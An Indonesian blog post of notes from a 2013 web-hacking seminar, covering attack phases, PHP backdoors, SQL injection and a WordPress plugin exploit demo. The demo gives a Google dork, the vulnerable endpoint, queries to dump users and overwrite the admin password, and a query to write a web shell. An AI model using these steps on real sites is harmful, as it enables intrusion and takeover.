Senin, 25 Maret 2013

Seminar ICT


Teka-Teki Report Password
(Web Hacking X-Code 2 Maret 2013 UIN Maulana Malik Ibrahim Malang )

Pengenalan Hacking
-          Ethical Hacker

Pemahaman dasar ethical hacker
Keamanan komputer menjadi penting?
-          Perkembangan komputer
-          Ketergantungan manusia
-          Tuntutan kompleksitas semakin tinggi
-          Keamanan menjadi anak tiri
-          Kemampuan orang disebut hacker menjadi menurun
-          Kemampuan rendah bisa menjadi ancaman tinggi untuk kepentingan umum

Terminologi hacker
-          Vulnerability
-          Threat
-          Attack
-          Exploit

Contoh Situs yang menyediakan exploits
u  Metasploit Frameworks
u  Exploit-db.com
u  securityfocus.com
u  Darkc0de.com
u  packetstormsecurity.org

Element-element keamanan (CIA)
u  Confidentiality
            Keamanan informasi data untuk diketahui atau dibaca oleh pihak yang tidak dikehendaki
u  Integrity / integritas
            Keamanan informasi data untuk menghindari adanya perubahan yang tidak dikehendaki
u  Availability
            Keamanan informasi data untuk ketersediaan atau keberadaannya

Pengelompokkan hacker
u  Black Hat Hacker
u  White Hat Hacker
u  Grey Hat Hacker
u  Suicide Hacker

Tahapan aktifitas Hacking
u  Reconnaissance
u  Scanning
u  Gaining Acces
u  Maintaining acces
u  Covering Tracks

a.      Reconnaissance
1.      Reconnaissance Passive
u  Pencarian data target di google
u  Pencarian data target di berbagai jejaring sosial

2.      Reconnaissance Active
u  HTTP Fingerprint

Pencarian exploit berdasarkan scanning
u  Google.com
u  Archive Milw0rm
u  Archive Exploit DB
u  Metasploit Framework
u  Darkc0de

Gaining Acces
a.      Exploitasi Remote Execution pada celah keamanan OS
  1. Exploitasi Remote Execution pada celah keamanan aplikasi
  2. Exploitasi Remote Execution pada celah keamanan web

Maintaining Acces
PHP Backdoor
1.      Simple php shell
  1. R57
  2. C99 / C100
  3. ASP Backdoor
  4. B374K

Covering tracks
a.      Pembersihan berbagai exploit atau software yang diupload
  1. Pembersihan jejak disesuaikan dengan penggunaan aplikasi di target dan ke target.

Konsep
SQL Injection
GET dan POST
1.      GET : www.site.com/form.php?nama=zae
  1. POST : www.site.com/form.php

IMPLEMENTASI pada method GET & POST
Langsung dari URL

Header : Content-Type: application/x-www-form-urlencoded
u  Data : variable=value

Query
-          $query = “SELECT * FROM contoh WHERE nama =’$username’”;
-          $username = dari GET atau POST

SQL Injection
u  $query = “SELECT namaTabel FROM contoh WHERE nama =’$username’”; DROP TABLE namaTabel; --’
u  $query = “SELECT namaTabel FROM contoh WHERE nama =‘terserah‘ OR ‘x’ = ‘x’”;



DEMO WEB HACKING
Wordpress Plugins - Google Maps via Store Locator Plus Multiple Vulnerability

a.      Vulnerability Info
  1. Description : Wordpress Plugins - Google Maps via Store Locator Plus Multiple Vulnerability
  2. Version : 2.7.1 - 3.0.1
  3. Link : http://wordpress.org/extend/plugins/store-locator-le/
  4. Plugins : http://downloads.wordpress.org/plugin/store-locator-le.3.0.1.zip
  5. Date : 26-05-2012
  6. Google Dork : inurl:/wp-content/plugins/store-locator-le/
  7. Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
  8. http://www.exemple.com/wordpress/wp-content/plugins/store-locator-le/downloadcsv.php


POST Method, Advanced REST Client
  1. Method : POST
  2. Header : Content-Type: application/x-www-form-urlencoded
  3. Data : query=[injection]
  4. Contoh:
query=SELECT * FROM wp_users

Mengatasi Teka-Teki Hash
Jangan hanya melihat database, do something

UPDATE – replace password
UPDATE  wp_users SET  user_pass =  '$P$BAu2rgOUahu8hibdJ12ToW4zu6b.XB.' WHERE  `wp_users`.`ID` =1 LIMIT 1 ;
Mengganti password menjadi “password

Upload b374k via Query
SELECT ’[kode script]’ INTO OUTFILE “e:/AppServ/www/ict2013/exploit.php”
http://localhost/ict2013/wp-content/plugins/store-locator-le/core/load_wp_config.php
+ diganti %2B

u  Base 64 Encryption
Base64 adalah istilah umum untuk sejumlah skema pengkodean serupa yang mengkodekan data biner dan menerjemahkannya ke dalam representasi basis 64. Istilah Base64 berasal dari konten pengkodean MIME tertentu. (Wikipedia, 2010)

PENGAMANAN
a.      Update CMS, plugin
b.      Menggunakan mysql_real_escape_string()
c.       Memberikan validasi pada tiap inputan
d.      Berikan length limit pada inputan
e.      Config database error report
f.        Setting php.ini
g.      dll










Tidak ada komentar:

Posting Komentar